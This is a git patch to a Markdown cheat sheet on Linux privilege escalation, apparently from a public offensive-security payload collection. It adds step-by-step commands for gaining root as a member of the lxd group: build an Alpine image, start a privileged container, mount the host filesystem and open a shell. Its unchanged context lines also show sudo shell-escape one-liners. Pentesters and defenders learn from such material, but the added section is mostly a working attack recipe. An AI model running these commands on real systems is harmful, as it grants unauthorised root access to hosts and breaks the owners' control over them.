From b22fd268003a66a526efd395f2d20dda120c4e58 Mon Sep 17 00:00:00 2001 From: Swissky Date: Thu, 7 Mar 2019 15:27:54 +0100 Subject: [PATCH] Linux PrivEsc - LXD Group --- .../Linux - Privilege Escalation.md | 38 +++++++++++++++++-- 1 file changed, 35 insertions(+), 3 deletions(-) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 951844d4..71b58497 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -29,6 +29,7 @@ * [Wildcard](#wildcard) * [Groups](#groups) * [Docker](#docker) + * [LXC/LXD](#lxc-lxd) ## Checklists @@ -157,7 +158,7 @@ sudo chmod +s /tmp/suid # setuid bit ### List capabilities of binaries ```bash -╭─swissky@crashmanjaro ~ +╭─swissky@lab ~ ╰─$ /usr/bin/getcap -r /usr/bin /usr/bin/fping = cap_net_raw+ep /usr/bin/dumpcap = cap_dac_override,cap_net_admin,cap_net_raw+eip @@ -253,7 +254,7 @@ The project collects legitimate functions of Unix binaries that can be abused to > gdb -nx -ex '!sh' -ex quit > sudo mysql -e '\! /bin/sh' -> strace -o /dev/null /bin/sh +> strace -o /dev/null /bin/sh > sudo awk 'BEGIN {system("/bin/sh")}' @@ -325,6 +326,36 @@ sh-5.0# id uid=0(root) gid=0(root) groups=0(root) ``` +### LXC/LXD + +The privesc requires to run a container with elevated privileges and mount the host filesystem inside. + +```powershell +╭─swissky@lab ~ +╰─$ id +uid=1000(swissky) gid=1000(swissky) groupes=1000(swissky),3(sys),90(network),98(power),110(lxd),991(lp),998(wheel) +``` + +Build an Alpine image and start it using the flag `security.privileged=true`, forcing the container to interact as root with the host filesystem. + +```powershell +# build a simple alpine image +git clone https://github.com/saghul/lxd-alpine-builder +./build-alpine -a i686 + +# import the image +lxc image import ./alpine.tar.gz --alias myimage + +# run the image +lxc init myimage mycontainer -c security.privileged=true + +# mount the /root into the image +lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true + +# interact with the container +lxc start mycontainer +lxc exec mycontainer /bin/sh +``` ## References @@ -335,4 +366,5 @@ uid=0(root) gid=0(root) groups=0(root) - [Exploiting wildcards on Linux - Berislav Kucan](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/) - [Code Execution With Tar Command - p4pentest](http://p4pentest.in/2016/10/19/code-execution-with-tar-command/) - [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic](http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt) -- [HOW TO EXPLOIT WEAK NFS PERMISSIONS THROUGH PRIVILEGE ESCALATION? - APRIL 25, 2018](https://www.securitynewspaper.com/2018/04/25/use-weak-nfs-permissions-escalate-linux-privileges/) \ No newline at end of file +- [HOW TO EXPLOIT WEAK NFS PERMISSIONS THROUGH PRIVILEGE ESCALATION? - APRIL 25, 2018](https://www.securitynewspaper.com/2018/04/25/use-weak-nfs-permissions-escalate-linux-privileges/) +- [Privilege Escalation via lxd - @reboare](https://reboare.github.io/lxd/lxd-escape.html) \ No newline at end of file